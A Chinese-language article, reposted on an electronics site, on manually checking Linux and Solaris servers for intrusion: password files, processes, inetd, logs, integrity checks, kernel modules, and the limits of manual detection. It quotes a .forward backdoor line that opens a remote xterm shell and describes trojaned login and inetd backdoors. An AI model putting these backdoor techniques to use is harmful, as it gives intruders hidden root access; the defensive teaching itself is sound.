0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

解析Linux如何判斷自己的服務(wù)器是否被入侵的檢測方法

馬哥Linux運維 ? 2018-01-13 10:27 ? 次閱讀

如何判斷自己的服務(wù)器是否被入侵了呢?僅僅靠兩只手是不夠的,但兩只手也能起到一些作用,我們先來看看UNIX系統(tǒng)上一些入侵檢測方法,以LINUX和solaris為例。

1、檢查系統(tǒng)密碼文件

首先從明顯的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。

檢查一下passwd文件中有哪些特權(quán)用戶,系統(tǒng)中uid為0的用戶都會被顯示出來。

順便再檢查一下系統(tǒng)里有沒有空口令帳戶:

2、查看一下進程,看看有沒有奇怪的進程

重點查看進程:

ps –aef | grep inetd

inetd是UNIX系統(tǒng)的守護進程,正常的inetd的pid都比較靠前,如果你看到輸出了一個類似inetd –s /tmp/.xxx之類的進程,著重看inetd –s后面的內(nèi)容。在正常情況下,LINUX系統(tǒng)中的inetd服務(wù)后面是沒有-s參數(shù)的,當(dāng)然也沒有用inetd去啟動某個文件;而solaris系統(tǒng)中也僅僅是inetd –s,同樣沒有用inetd去啟動某個特定的文件;如果你使用ps命令看到inetd啟動了某個文件,而你自己又沒有用inetd啟動這個文件,那就說明已經(jīng)有人入侵了你的系統(tǒng),并且以root權(quán)限起了一個簡單的后門。

輸入ps –aef 查看輸出信息,尤其注意有沒有以./xxx開頭的進程。一旦發(fā)現(xiàn)異樣的進程,經(jīng)檢查為入侵者留下的后門程序,立即運行kill –9 pid 開殺死該進程,然后再運行ps –aef查看該進程是否被殺死;一旦此類進程出現(xiàn)殺死以后又重新啟動的現(xiàn)象,則證明系統(tǒng)被人放置了自動啟動程序的腳本。這個時候要進行仔細查找:find / -name 程序名 –print,假設(shè)系統(tǒng)真的被入侵者放置了后門,根據(jù)找到的程序所在的目錄,會找到很多有趣的東東J

UNIX下隱藏進程有的時候通過替換ps文件來做,檢測這種方法涉及到檢查文件完整性,稍后我們再討論這種方法。接下來根據(jù)找到入侵者在服務(wù)器上的文件目錄,一步一步進行追蹤。

3、檢查系統(tǒng)守護進程

檢查/etc/inetd.conf文件,輸入:cat /etc/inetd.conf | grep –v “^#”,輸出的信息就是你這臺機器所開啟的遠程服務(wù)。

一般入侵者可以通過直接替換in.xxx程序來創(chuàng)建一個后門,比如用/bin/sh 替換掉in.telnetd,然后重新啟動inetd服務(wù),那么telnet到服務(wù)器上的所有用戶將不用輸入用戶名和密碼而直接獲得一個rootshell。

4、檢查網(wǎng)絡(luò)連接和監(jiān)聽端口

輸入netstat -an,列出本機所有的連接和監(jiān)聽的端口,查看有沒有非法連接。

輸入netstat –rn,查看本機的路由、網(wǎng)關(guān)設(shè)置是否正確。

輸入 ifconfig –a,查看網(wǎng)卡設(shè)置。

5、檢查系統(tǒng)日志

命令last | more查看在正常情況下登錄到本機的所有用戶的歷史記錄。但last命令依賴于syslog進程,這已經(jīng)成為入侵者攻擊的重要目標(biāo)。入侵者通常會停止系統(tǒng)的syslog,查看系統(tǒng)syslog進程的情況,判斷syslog上次啟動的時間是否正常,因為syslog是以root身份執(zhí)行的,如果發(fā)現(xiàn)syslog被非法動過,那說明有重大的入侵事件。

在linux下輸入ls –al /var/log

在solaris下輸入 ls –al /var/adm

檢查wtmp utmp,包括messgae等文件的完整性和修改時間是否正常,這也是手工擦除入侵痕跡的一種方法。

6、檢查系統(tǒng)中的core文件

通過發(fā)送畸形請求來攻擊服務(wù)器的某一服務(wù)來入侵系統(tǒng)是一種常規(guī)的入侵方法,典型的RPC攻擊就是通過這種方式。這種方式有一定的成功率,也就是說它并不能100%保證成功入侵系統(tǒng),而且通常會在服務(wù)器相應(yīng)目錄下產(chǎn)生core文件,全局查找系統(tǒng)中的core文件,輸入find / -name core –exec ls –l {} ; 依據(jù)core所在的目錄、查詢core文件來判斷是否有入侵行為。

7、.rhosts和.forward

這是兩種比較著名的后門文件,如果想檢查你的系統(tǒng)是否被入侵者安裝了后門,不妨全局查找這兩個文件:

find/-name“.rhosts”–print

find/-name“.forward”–print

在某用戶的$HOME下,.rhosts文件中僅包含兩個+號是非常危險的,如果你的系統(tǒng)上開了513端口(rlogin端口,和telnet作用相同),那么任意是誰都可以用這個用戶登錄到你的系統(tǒng)上而不需要任何驗證。

Unix下在.forward文件里放入命令是重新獲得訪問的常用方法在某一 用戶$HOME下的.forward可能設(shè)置如下:

username|"/usr/local/X11/bin/xterm-disphacksys.other.dom:0.0–e/bin/sh"

這種方法的變形包括改變系統(tǒng)的mail的別名文件(通常位于/etc/aliases). 注意這只是一種簡單的變換. 更為高級的能夠從.forward中運行簡單腳本實現(xiàn)在標(biāo)準(zhǔn)輸入執(zhí)行任意命令(小部分預(yù)處理后).利用smrsh可以有效的制止這種后門(雖然如果允許可以自運行的elm's filter或procmail類程序, 很有可能還有問題。在Solaris系統(tǒng)下,如果你運行如下命令:

ln-s/var/mail/luser~/.forward

然后設(shè)置vacation有效,那么/var/mail/luser就會被拷貝到~/.forward,同時會附加"|/usr/bin/vacation me",舊的symlink被移到~/.forward..BACKUP中。直接刪除掉這兩個文件也可以。

8、檢查系統(tǒng)文件完整性

檢查文件的完整性有多種方法,通常我們通過輸入ls –l 文件名來查詢和比較文件,這種方法雖然簡單,但還是有一定的實用性。但是如果ls文件都已經(jīng)被替換了就比較麻煩。在LINUX下可以用rpm –V `rpm –qf 文件名` 來查詢,國家查詢的結(jié)果是否正常來判斷文件是否完整。在LINUX下使用rpm來檢查文件的完整性的方法也很多,這里不一一贅述,可以man rpm來獲得更多的格式。

UNIX系統(tǒng)中,/bin/login是被入侵者經(jīng)常替換作為后門的文件,接下來談一下login后門 :

UNIX里,Login程序通常用來對telnet來的用戶進行口令驗證。入侵者獲取login的源代碼并修改,使它在比較輸入口令與存儲口令時先檢查后門口令。如果用戶敲入后門口令,它將忽視管理員設(shè)置的口令讓你長驅(qū)直入:這將允許入侵者進入任何賬號,甚至是root目錄。由于后門口令是在用戶真實登錄并被日志記錄到utmp和wtmP前產(chǎn)生的一個訪問,所以入侵者可以登錄獲取shell卻不會暴露該賬號。管理員注意到這種后門后,使用”strings”命令搜索login程序以尋找文本信息。許多情況下后門口令會原形畢露。入侵者又會開始加密或者更改隱藏口令,使strings命令失效。所以許多管理員利用MD5校驗和檢測這種后門。UNIX系統(tǒng)中有md5sum命令,輸入md5sum 文件名檢查該文件的md5簽名。它的使用格式如下:md5sum –b 使用二進制方式閱讀文件;md5sum –c 逆向檢查MD5簽名;md5sum –t 使用文本方式閱讀文件。

在前面提到過守護進程,對于守護進程配置文件inetd.conf中沒有被注釋掉的行要進行仔細比較,舉個簡單的例子,如果你開放了telnet服務(wù),守護進程配置文件中就會有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd,檢查該文件的完整性,入侵者往往通過替換守護進程中允許的服務(wù)文件來為自己創(chuàng)建一個后門。

LINUX系統(tǒng)中的/etc/crontab也是經(jīng)常被入侵者利用的一個文件,檢查該文件的完整性,可以直接cat /etc/crontab,仔細閱讀該文件有沒有被入侵者利用來做其他的事情。

不替換login等文件而直接使用進程來啟動后門的方法有一個缺陷,即系統(tǒng)一旦重新啟動,這個進程就被殺死了,所以得讓這個后門在系統(tǒng)啟動的時候也啟動起來。通常通過檢查/etc/rc.d下的文件來查看系統(tǒng)啟動的時候是不是帶有后門程序;這個方法怎么有點象查windows下的trojan?

說到這里,另外提一下,如果在某一目錄下發(fā)現(xiàn)有屬性為這樣的文件:-rwsr-xr-x 1 root root xxx .sh,這個表明任何用戶進來以后運行這個文件都可以獲得一個rootshell,這就是setuid文件。運行 find –perm 4000 –print對此類文件進行全局查找,然后刪除這樣的文件。

9、檢查內(nèi)核級后門

如果你的系統(tǒng)被人安裝了這種后門,通常都是比較討厭的,我常常就在想,遇到這種情況還是重新安裝系統(tǒng)算了J,言歸正傳,首先,檢查系統(tǒng)加載的模塊,在LINUX系統(tǒng)下使用lsmod命令,在solaris系統(tǒng)下使用modinfo命令來查看。這里需要說明的是,一般默認(rèn)安裝的LINUX加載的模塊都比較少,通常就是網(wǎng)卡的驅(qū)動;而solaris下就很多,沒別的辦法,只有一條一條地去分析。對內(nèi)核進行加固后,應(yīng)禁止插入或刪除模塊,從而保護系統(tǒng)的安全,否則入侵者將有可能再次對系統(tǒng)調(diào)用進行替換。我們可以通過替換create_module()和delete_module()來達到上述目的。

另外,對這個內(nèi)核進行加固模塊時應(yīng)盡早進行,以防系統(tǒng)調(diào)用已經(jīng)被入侵者替換。如果系統(tǒng)被加載了后門模塊,但是在模塊列表/proc/module里又看不到它們,有可能是使用了hack工具來移除加載的模塊,大名鼎鼎的knark工具包就有移除加載模塊的工具。出現(xiàn)這種情況,需要仔細查找/proc目錄,根據(jù)查找到的文件和經(jīng)驗來判斷被隱藏和偽裝的進程。Knark后門模塊就在/proc/knark目錄,當(dāng)然可能這個目錄是隱藏的。

10、手工入侵檢測的缺陷

上面談了一些手工入侵檢測的方法,但這些方式有一定的缺陷,有的甚至是不可避免的缺陷,這就是為什么說手工檢測是“體力活”的原因。我們先來看看這些缺陷:

1)手工入侵檢測只能基于主機,也就是說所有的入侵檢測工作只能在操作系統(tǒng)下面完成,這是它固有的缺陷;基本上所有凌駕于操作系統(tǒng)之外的入侵行為統(tǒng)統(tǒng)無法探測得到。網(wǎng)絡(luò)級的入侵,交換機、路由器上面的入侵和攻擊行為,作為服務(wù)器的操作系統(tǒng)都無法得知;信息已經(jīng)從主機發(fā)送出去了,如果在傳送的介質(zhì)當(dāng)中被攔截,主機的操作系統(tǒng)是永遠無動于衷的。

2)手工的入侵檢測要求精通操作系統(tǒng),并且漏洞庫資料的刷新要快;在做一個網(wǎng)管的同時要做一個黑客??梢哉f經(jīng)驗的積累永遠跟不上全世界漏洞資料的更新,難保系統(tǒng)不被新的漏洞所侵入。

3)手工入侵檢測只是“就事論事”,根據(jù)發(fā)生的某一情況判斷入侵事件,再作出相應(yīng)的對應(yīng)和防范措施,而無法預(yù)先根據(jù)入侵者的探測行為作出對攻擊事件的描述,定義事件級別,在不防礙系統(tǒng)正常工作的情況下阻止下一步對系統(tǒng)的入侵行為。

4)可以通過手工入侵檢測發(fā)現(xiàn)主機上的某些漏洞,進而作出相應(yīng)的安全措施。但卻避免不了一種現(xiàn)象:無法避免兩個入侵者利用同一個漏洞攻擊主機,即無法判斷攻擊模式來切斷入侵行為。

5)綜上所述,手工的入侵檢測行為對于系統(tǒng)安全來說只是治標(biāo)而不治本,多半還是依靠管理員的技巧和經(jīng)驗來增強系統(tǒng)的安全性,沒有,也不可能形成真正的安全體系,雖然聊勝于無,可以檢測和追蹤到某些入侵行為,但如果碰上同樣精通系統(tǒng)的入侵者就很難抓住蹤跡了。

11、入侵檢測系統(tǒng)的比較

搭建真正的安全體系需要入侵檢測系統(tǒng)—IDS,一個優(yōu)秀的入侵檢測系統(tǒng)輔以系統(tǒng)管理員的技巧和經(jīng)驗可以形成真正的安全體系,有效判斷和切斷入侵行為,真正保護主機、資料。人們有時候會以為ISS的realsecure是優(yōu)秀的入侵檢測系統(tǒng),其實不然,realsecure帶有一定的缺陷,不談它對事件的誤報、漏報和錯報,首先它是一個英文的軟件,使用和熟悉起來有一定的難度。而且由于是外國人的軟件,很多hack對realsecure有深入的研究,已經(jīng)發(fā)掘出它的一些漏洞,甚至是固有漏洞,我就曾經(jīng)測試出有的攻擊手段可以令realsecure癱瘓。

再者,realsecure也是架設(shè)在服務(wù)器操作系統(tǒng)之上的,操作系統(tǒng)停止工作,同樣令之停止工作,換句話說,很簡單,攻擊者攻擊的目標(biāo)往往就是realsecure本身。設(shè)想,假設(shè)你的系統(tǒng)依賴于入侵檢測系統(tǒng),而入侵檢測系統(tǒng)被攻擊者搞掉,那你的系統(tǒng)將大門敞開,任由出入,后果不堪設(shè)想。

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • Linux
    +關(guān)注

    關(guān)注

    87

    文章

    11304

    瀏覽量

    209521
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    9160

    瀏覽量

    85427
  • Solaris
    +關(guān)注

    關(guān)注

    0

    文章

    6

    瀏覽量

    7915

原文標(biāo)題:Linux如何判斷自己的服務(wù)器是否被入侵

文章出處:【微信號:magedu-Linux,微信公眾號:馬哥Linux運維】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    linux服務(wù)器和windows服務(wù)器

    和適用性。 首先,Linux服務(wù)器是一種基于開源的操作系統(tǒng),其內(nèi)核是由許多個人和組織共同開發(fā)和維護的。它具有高度的穩(wěn)定性和安全 性。由于Linux操作系統(tǒng)的開放性,用戶可以根據(jù)自己的需
    發(fā)表于 02-22 15:46

    [轉(zhuǎn)帖]用獨立服務(wù)器的站長常犯的錯誤

    服務(wù)器裝完了系統(tǒng)都有個默認(rèn)的密碼的,不修改的話很容易被黑。4、請用檢測軟件查看您服務(wù)器的硬件使用檢測軟件可以得到你服務(wù)器中大部分硬件的品牌
    發(fā)表于 03-18 15:53

    用獨立服務(wù)器的站長常犯的錯誤

    服務(wù)器裝完了系統(tǒng)都有個默認(rèn)的密碼的,不修改的話很容易被黑。4、請用檢測軟件查看您服務(wù)器的硬件使用檢測軟件可以得到你服務(wù)器中大部分硬件的品牌
    發(fā)表于 03-19 12:02

    寶界科技WEB服務(wù)器立體防御解決方案

    ,與網(wǎng)絡(luò)層設(shè)備防火墻、入侵檢測系統(tǒng)進行互動,一旦發(fā)現(xiàn)攻擊篡改行為立即告知防火墻、入侵檢測系統(tǒng),由它們自動判斷攻擊源,實時切斷其網(wǎng)絡(luò)鏈接。 汲
    發(fā)表于 05-17 14:01

    寶界科技WEB服務(wù)器立體防御解決方案

    ,與網(wǎng)絡(luò)層設(shè)備防火墻、入侵檢測系統(tǒng)進行互動,一旦發(fā)現(xiàn)攻擊篡改行為立即告知防火墻、入侵檢測系統(tǒng),由它們自動判斷攻擊源,實時切斷其網(wǎng)絡(luò)鏈接。 汲
    發(fā)表于 08-19 11:02

    入侵服務(wù)器的癥狀分析與應(yīng)對方法

    本指南中所謂的服務(wù)器入侵或者說被黑了的意思,是指未經(jīng)授權(quán)的人或程序為了自己的目的登錄到服務(wù)器上去并使用其計算資源,通常會產(chǎn)生不好的影響。
    的頭像 發(fā)表于 12-25 10:26 ?3804次閱讀

    如何判斷網(wǎng)站是否CC攻擊

    如何判斷網(wǎng)站是否CC攻擊?什么是CC攻擊?CC就是模擬多個用戶不停地進行訪問那些需要大量數(shù)據(jù)操作的頁面,造成服務(wù)器資源的浪費,CPU長時間處于100%,永遠都有處理不完的連接直至就網(wǎng)
    發(fā)表于 01-30 15:22 ?454次閱讀
    如何<b class='flag-5'>判斷</b>網(wǎng)站<b class='flag-5'>是否</b><b class='flag-5'>被</b>CC攻擊

    如何查看云服務(wù)器是否遭受過網(wǎng)絡(luò)攻擊

    服務(wù)器怎么查看攻擊?有時候云服務(wù)器出現(xiàn)異常,有可能是人為操作不當(dāng)引起的,也有可能是系統(tǒng)被黑客入侵了。
    發(fā)表于 01-05 11:26 ?2301次閱讀

    判斷Linux庫文件編譯時是否運用-g選項的方法

    判斷Linux庫文件編譯時是否運用-g選項的方法
    的頭像 發(fā)表于 06-22 08:40 ?3456次閱讀
    <b class='flag-5'>判斷</b><b class='flag-5'>Linux</b>庫文件編譯時<b class='flag-5'>是否</b>運用-g選項的<b class='flag-5'>方法</b>

    如何鑒別Linux服務(wù)器是否入侵

    隨著開源產(chǎn)品的越來越盛行,作為一個Linux運維工程師,能夠清晰地鑒別異常機器是否已經(jīng)入侵了顯得至關(guān)重要,個人結(jié)合自己的工作經(jīng)歷,整理了幾
    的頭像 發(fā)表于 03-16 10:08 ?1300次閱讀

    服務(wù)器入侵挖礦的過程與解決方法

    常在河邊走,哪能不濕鞋。自認(rèn)為安全防范意識不錯,沒想到服務(wù)器入侵挖礦的事情也能落到自己頭上。
    的頭像 發(fā)表于 07-22 16:47 ?6799次閱讀

    Linux服務(wù)器常見的網(wǎng)絡(luò)故障排查方法

    日常工作中我們有時會遇到服務(wù)器網(wǎng)絡(luò)不通問題,導(dǎo)致服務(wù)器無法正常運行。要想解決服務(wù)器網(wǎng)絡(luò)故障問題,通常要先進行網(wǎng)絡(luò)故障排查,這里以Linux服務(wù)器
    的頭像 發(fā)表于 04-14 15:47 ?2821次閱讀

    手動檢測是否入侵

    Gitlab代碼是否又被修改過,用gitdiff查看 查看代碼的日志 代碼是否改動過 查看服務(wù)器日志 是否有被劫持 查看登錄記錄 查看非
    發(fā)表于 02-29 10:45 ?1029次閱讀

    服務(wù)器入侵現(xiàn)象、排查和處理步驟

    近期有一個朋友的服務(wù)器(自己做了網(wǎng)站)好像遭遇了入侵,具體現(xiàn)象是: 服務(wù)器 CPU 資源長期 100%,負(fù)載較高。 服務(wù)器上面的
    發(fā)表于 03-22 10:56 ?1122次閱讀
    <b class='flag-5'>服務(wù)器</b><b class='flag-5'>入侵</b>現(xiàn)象、排查和處理步驟

    Linux服務(wù)器性能查看方法

    Linux服務(wù)器性能查看是系統(tǒng)管理員和開發(fā)人員在日常工作中經(jīng)常需要進行的任務(wù),以確保系統(tǒng)穩(wěn)定運行并優(yōu)化資源使用。以下將詳細介紹多種Linux服務(wù)器性能查看的
    的頭像 發(fā)表于 09-02 11:15 ?1069次閱讀